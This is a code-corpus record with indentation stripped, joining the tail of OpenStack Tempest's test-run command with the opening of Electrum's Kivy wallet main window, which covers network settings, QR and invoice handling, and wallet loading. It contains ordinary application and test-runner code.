path = workspace_mgr.get_workspace(parsed_args.workspace)
if not path:
sys.exit(
"The %r workspace isn't registered in "
"%r. Use 'tempest init' to "
"register the workspace." %
(parsed_args.workspace, workspace_mgr.path))
os.chdir(path)
# NOTE(mtreinish): tempest init should create a .testrepository dir
# but since workspaces can be imported let's sanity check and
# ensure that one is created
self._create_testrepository()
# Local execution mode
elif os.path.isfile('.testr.conf'):
# If you're running in local execution mode and there is not a
# testrepository dir create one
self._create_testrepository()
# local execution with config file mode
elif parsed_args.config_file:
self._create_testr_conf()
self._create_testrepository()
else:
print("No .testr.conf file was found for local execution")
sys.exit(2)
if parsed_args.state:
self._init_state()
else:
pass
if parsed_args.combine:
temp_stream = tempfile.NamedTemporaryFile()
return_code = run_argv(['tempest', 'last', '--subunit'], sys.stdin,
temp_stream, sys.stderr)
if return_code > 0:
sys.exit(return_code)
regex = self._build_regex(parsed_args)
if parsed_args.list_tests:
argv = ['tempest', 'list-tests', regex]
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
options = self._build_options(parsed_args)
returncode = self._run(regex, options)
if returncode > 0:
sys.exit(returncode)
if parsed_args.combine:
return_code = run_argv(['tempest', 'last', '--subunit'], sys.stdin,
temp_stream, sys.stderr)
if return_code > 0:
sys.exit(return_code)
returncode = run_argv(['tempest', 'load', temp_stream.name],
sys.stdin, sys.stdout, sys.stderr)
sys.exit(returncode)
def get_description(self):
return 'Run tempest'
def _init_state(self):
print("Initializing saved state.")
data = {}
self.global_services = cleanup_service.get_global_cleanup_services()
self.admin_mgr = clients.Manager(
credentials.get_configured_admin_credentials())
admin_mgr = self.admin_mgr
kwargs = {'data': data,
'is_dry_run': False,
'saved_state_json': data,
'is_preserve': False,
'is_save_state': True}
for service in self.global_services:
svc = service(admin_mgr, **kwargs)
svc.run()
with open(SAVED_STATE_JSON, 'w+') as f:
f.write(json.dumps(data,
sort_keys=True, indent=2, separators=(',', ': ')))
def get_parser(self, prog_name):
parser = super(TempestRun, self).get_parser(prog_name)
parser = self._add_args(parser)
return parser
def _add_args(self, parser):
# workspace args
parser.add_argument('--workspace', default=None,
help='Name of tempest workspace to use for running'
' tests. You can see a list of workspaces '
'with tempest workspace list')
parser.add_argument('--workspace-path', default=None,
dest='workspace_path',
help="The path to the workspace file, the default "
"is ~/.tempest/workspace.yaml")
# Configuration flags
parser.add_argument('--config-file', default=None, dest='config_file',
help='Configuration file to run tempest with')
# test selection args
regex = parser.add_mutually_exclusive_group()
regex.add_argument('--smoke', '-s', action='store_true',
help="Run the smoke tests only")
regex.add_argument('--regex', '-r', default='',
help='A normal testr selection regex used to '
'specify a subset of tests to run')
list_selector = parser.add_mutually_exclusive_group()
list_selector.add_argument('--whitelist-file', '--whitelist_file',
help="Path to a whitelist file, this file "
"contains a separate regex on each "
"newline.")
list_selector.add_argument('--blacklist-file', '--blacklist_file',
help='Path to a blacklist file, this file '
'contains a separate regex exclude on '
'each newline')
list_selector.add_argument('--load-list', '--load_list',
help='Path to a non-regex whitelist file, '
'this file contains a seperate test '
'on each newline. This command'
'supports files created by the tempest'
'run ``--list-tests`` command')
# list only args
parser.add_argument('--list-tests', '-l', action='store_true',
help='List tests',
default=False)
# execution args
parser.add_argument('--concurrency', '-w',
help="The number of workers to use, defaults to "
"the number of cpus")
parallel = parser.add_mutually_exclusive_group()
parallel.add_argument('--parallel', dest='parallel',
action='store_true',
help='Run tests in parallel (this is the'
' default)')
parallel.add_argument('--serial', '-t', dest='parallel',
action='store_false',
help='Run tests serially')
parser.add_argument('--save-state', dest='state',
action='store_true',
help="To save the state of the cloud before "
"running tempest.")
# output args
parser.add_argument("--subunit", action='store_true',
help='Enable subunit v2 output')
parser.add_argument("--combine", action='store_true',
help='Combine the output of this run with the '
"previous run's as a combined stream in the "
"testr repository after it finish")
parser.set_defaults(parallel=True)
return parser
def _build_regex(self, parsed_args):
regex = ''
if parsed_args.smoke:
regex = 'smoke'
elif parsed_args.regex:
regex = parsed_args.regex
if parsed_args.whitelist_file or parsed_args.blacklist_file:
regex = regex_builder.construct_regex(parsed_args.blacklist_file,
parsed_args.whitelist_file,
regex, False)
return regex
def _build_options(self, parsed_args):
options = []
if parsed_args.subunit:
options.append("--subunit")
if parsed_args.parallel:
options.append("--parallel")
if parsed_args.concurrency:
options.append("--concurrency=%s" % parsed_args.concurrency)
if parsed_args.load_list:
options.append("--load-list=%s" % parsed_args.load_list)
return options
def _run(self, regex, options):
returncode = 0
argv = ['tempest', 'run', regex] + options
if '--subunit' in options:
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
argv.append('--subunit')
stdin = io.StringIO()
stdout_r, stdout_w = os.pipe()
subunit_w = os.fdopen(stdout_w, 'wt')
subunit_r = os.fdopen(stdout_r)
returncodes = {}
def run_argv_thread():
returncodes['testr'] = run_argv(argv, stdin, subunit_w,
sys.stderr)
subunit_w.close()
run_thread = threading.Thread(target=run_argv_thread)
run_thread.start()
returncodes['subunit-trace'] = subunit_trace.trace(
subunit_r, sys.stdout, post_fails=True, print_failures=True)
run_thread.join()
subunit_r.close()
# python version of pipefail
if returncodes['testr']:
returncode = returncodes['testr']
elif returncodes['subunit-trace']:
returncode = returncodes['subunit-trace']
return returncode
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
PR_PAID, PR_FAILED, maybe_extract_bolt11_invoice)
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.storage.put('use_change', self.use_change)
self.wallet.storage.write()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.set_status(status)
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key, status):
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.set_status(status)
if status == PR_PAID:
self.show_info(_('Payment was sent'))
self._trigger_update_history()
elif status == PR_FAILED:
self.show_info(_('Payment failed'))
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key, is_lightning=is_lightning)
self.request_popup.set_status(request['status'])
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
status = invoice['status']
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.set_status(status)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.network.register_callback(self.on_channels, ['channels_updated'])
self.network.register_callback(self.on_channel, ['channel'])
self.network.register_callback(self.on_invoice_status, ['invoice_status'])
self.network.register_callback(self.on_request_status, ['request_status'])
self.network.register_callback(self.on_channel_db, ['channel_db'])
self.network.register_callback(self.set_num_peers, ['gossip_peers'])
self.network.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
if storage.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage)
else:
self.on_wizard_complete(wizard=None, storage=storage)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if platform == 'android' and wallet.has_password():
self.password_dialog(wallet=wallet, msg=_('Enter PIN code'),
on_success=lambda x: self.load_wallet(wallet), on_failure=self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
if storage.is_encrypted():
if not storage.is_encrypted_with_user_pw():
raise Exception("Kivy GUI does not support this type of encrypted wallet files.")
def on_password(pw):
storage.decrypt(pw)
self._on_decrypted_storage(storage)
self.password_dialog(wallet=storage, msg=_('Enter PIN code'),
on_success=on_password, on_failure=self.stop)
return
self._on_decrypted_storage(storage)
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if not self.wallet.has_lightning():
self.show_error('Lightning not enabled on this wallet')
return
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
